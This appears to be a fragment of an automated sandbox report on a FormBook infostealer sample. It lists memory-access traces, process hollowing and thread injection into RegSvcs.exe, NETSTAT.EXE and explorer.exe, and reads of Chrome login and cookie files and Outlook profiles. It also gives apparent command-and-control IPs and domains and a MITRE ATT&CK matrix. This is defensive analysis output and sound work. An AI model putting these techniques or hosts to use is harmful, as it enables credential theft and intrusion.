      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01377794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01308794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013337F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01328E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0130766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013746A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0138FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013216E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013076E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013C8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01338EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013AFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013236CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03668B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036153CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03665BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03668A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03624257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03595210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035A8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035CFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03599100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035C513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035B4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_036241E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0359B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.236.89 80
      Source: C:\Windows\explorer.exeDomain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exeDomain query: www.marketmall.digital
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.132 80
      Source: C:\Windows\explorer.exeNetwork Connect: 54.38.220.85 80
      Source: C:\Windows\explorer.exeNetwork Connect: 154.209.6.241 80
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80
      Source: C:\Windows\explorer.exeDomain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exeDomain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exeNetwork Connect: 162.213.255.142 80
      Source: C:\Windows\explorer.exeDomain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exeDomain query: www.dersameh.com
      Sample uses process hollowing technique
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1010000
      Maps a DLL or memory area into another process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
      Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008
      Allocates memory in foreign processes
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\NHYGUnNN.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3452
      Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3452
      Source: C:\Users\user\Desktop\NHYGUnNN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
      Source: explorer.exe, 00000002.00000000.304298844.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253031171.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager (Not Responding)
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\NHYGUnNN.exeQueries volume information: C:\Users\user\Desktop\NHYGUnNN.exe VolumeInformation
      Source: C:\Users\user\Desktop\NHYGUnNN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\NETSTAT.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Shared Modules      		Path Interception812
      Process Injection      		1
      Masquerading      		1
      OS Credential Dumping      		21
      Security Software Discovery      		Remote Services1
      Email Collection      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth3
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares1
      Data from Local System      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
      Process Injection      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      System Network Configuration Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common4
      Obfuscated Files or Information      		Cached Domain Credentials1
      System Network Connections Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Software Packing      		DCSync1
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
